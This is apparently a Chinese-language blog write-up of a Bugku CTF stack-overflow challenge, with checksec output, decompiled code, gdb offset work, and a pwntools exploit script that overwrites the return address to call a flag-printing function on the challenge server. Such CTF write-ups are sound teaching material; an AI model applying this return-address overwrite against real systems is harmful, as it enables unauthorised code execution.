【ctf题目系列】bugku pwn类型

overflow

checksec检查

1
2
3
4
5
6
7
8
9
10
11
[root@ningan 01-overflow]# checksec pwn2
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[*] '/root/ctf/bugku/01-overflow/pwn2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
[root@ningan 01-overflow]#

ida分析

1
2
3
4
5
6
7
8
9
10
11
12
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[48]; // [rsp+0h] [rbp-30h] BYREF

  memset(s, 0, sizeof(s));
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  puts("say something?");
  read(0, s, 0x100uLL);
  puts("oh,that's so boring!");
  return 0;
}

image.png

image.png

1
2
3
4
5
6
int get_shell_()
{
  puts("tql~tql~tql~tql~tql~tql~tql");
  puts("this is your flag!");
  return system("cat flag");
}

ida分析:查看函数地址

image.png

gdb分析:查看偏移

image.png

image.png

1
2
3
4
5
6
7
8
[root@ningan 01-overflow]# python
Python 3.6.9 (default, Mar 10 2023, 16:46:00)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x1a0 - 0x170
48


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[root@ningan 01-overflow]# cat exp.py

from pwn import *

#io = process("./pwn2")
io = remote("114.67.175.224", 18554)

context.arch = "amd64"
payload = b'A' * 48 + b'BBBBBBBB' + p64(0x0000000000400751)

io.recvline()
# io.recvline()
io.sendline(payload)
io.interactive()

最终结果

1
2
3
4
5
6
7
8
9
10
11
12
13
[root@ningan 01-overflow]# python exp.py
[+] Opening connection to 114.67.175.224 on port 18554: Done
[*] Switching to interactive mode
oh,that's so boring!
tql~tql~tql~tql~tql~tql~tql
this is your flag!
flag{99kls08s6d5a73bcd}
[*] Got EOF while reading in interactive
$
$
[*] Closed connection to 114.67.175.224 port 18554
[*] Got EOF while sending in interactive

ctf
【ctf题目系列】bugku pwn类型
http://example.com/2023/08/16/ctf/【ctf题目系列】bugku pwn类型/
作者
ningan123
发布于
2023年8月16日
许可协议